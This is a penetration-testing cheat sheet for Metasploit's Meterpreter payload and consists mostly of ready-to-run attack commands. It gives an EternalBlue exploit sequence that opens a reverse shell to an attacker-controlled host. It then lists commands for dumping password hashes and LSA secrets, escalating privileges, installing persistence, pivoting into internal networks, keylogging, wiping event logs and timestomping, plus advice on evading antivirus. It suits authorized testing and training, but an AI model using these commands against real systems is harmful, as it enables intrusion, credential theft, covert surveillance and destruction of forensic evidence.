Meterpreter
Meterpreter.md
Meterpreter
Overview
Meterpreter (Meta-Interpreter) is an advanced, dynamically extensible payload that runs entirely in memory on a compromised host. It is the primary post-exploitation shell within Metasploit, communicating over an encrypted channel and leaving minimal disk artifacts.
Category
#maintaining-access #post-exploitation #payload
Phase
Maintaining Access
Part Of
Metasploit Framework
Key Characteristics
- In-memory only — does not write to disk by default (evades disk-based AV)
- Encrypted comms — uses TLS to communicate with the handler
- Extensible — dynamically loads extensions without restarting
- Channel-based — can open multiple simultaneous data channels
- Pivoting capable — can route traffic through the compromised host
Getting a Meterpreter Session
# In msfconsole — example using EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run
# Meterpreter prompt appears:
meterpreter >
Core Commands
System Information
sysinfo # Hostname, OS, architecture, domain
getuid # Who you're running as
getpid # Current process ID
ps # List all running processes
File System
pwd # Print working directory
ls # List directory
cd C:\\Users # Change directory
cat file.txt # Read file
upload /local/file.txt C:\\Temp\\file.txt
download C:\\passwords.txt /local/loot/
search -f *.txt # Search for files by pattern
Privilege Escalation
getsystem # Auto-attempt multiple privesc methods
getuid # Confirm NT AUTHORITY\SYSTEM
run post/multi/recon/local_exploit_suggester # Find local privesc paths
Process Manipulation
migrate 1234 # Migrate into another process by PID
# Migrate into explorer.exe or lsass.exe for stability/credential access
Credential Harvesting
hashdump # Dump local SAM database (NTLM hashes)
run post/windows/gather/credentials/credential_collector
load kiwi # Load Mimikatz-like module
creds_all # Dump all credential types (requires kiwi)
lsa_dump_sam # SAM database via kiwi
lsa_dump_secrets # LSA secrets via kiwi
Persistence
run post/windows/manage/persistence_exe
run post/linux/manage/cron_persistence
# Note: persistence leaves artifacts — confirm scope allows this
Pivoting & Port Forwarding
# Forward local port to internal host via compromised machine
portfwd add -l 3389 -p 3389 -r 10.10.10.5
# Set up SOCKS proxy through the session for full pivoting
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
# Background the session first:
background
Networking
ipconfig / ifconfig # Network interfaces
arp # ARP table (discover other hosts)
route # Routing table
Stealth
timestomp C:\\file.txt -m "01/01/2020 00:00:00" # Modify timestamps
clearev # Clear Windows event logs
Screenshots & Keylogging
screenshot # Capture desktop screenshot
keyscan_start # Start keylogger
keyscan_dump # Dump captured keystrokes
keyscan_stop
Meterpreter Variants
| Payload | Target |
|---|---|
windows/meterpreter/reverse_tcp |
Windows x86 |
windows/x64/meterpreter/reverse_tcp |
Windows x64 |
linux/x86/meterpreter/reverse_tcp |
Linux x86 |
linux/x64/meterpreter/reverse_tcp |
Linux x64 |
java/meterpreter/reverse_tcp |
Cross-platform (JVM) |
php/meterpreter_reverse_tcp |
PHP web shells |
python/meterpreter/reverse_tcp |
Python environments |
android/meterpreter/reverse_tcp |
Android |
OPSEC Notes
Although Meterpreter is memory-resident, it is well-known to AV/EDR vendors. Use encoders, custom stagers, or commercial C2 frameworks for engagements against hardened targets. Always operate within authorized scope.
clearevandtimestompcan destroy forensic evidence — confirm this is within scope.
Related Tools
- Metasploit — Parent framework; Meterpreter is its primary payload
- Netcat — Lightweight alternative when Meterpreter is too heavy/detected
- LinPEAS / WinPEAS — Run these from within Meterpreter for privesc enumeration
Tags
#ethical-hacking #maintaining-access #post-exploitation #payload #meterpreter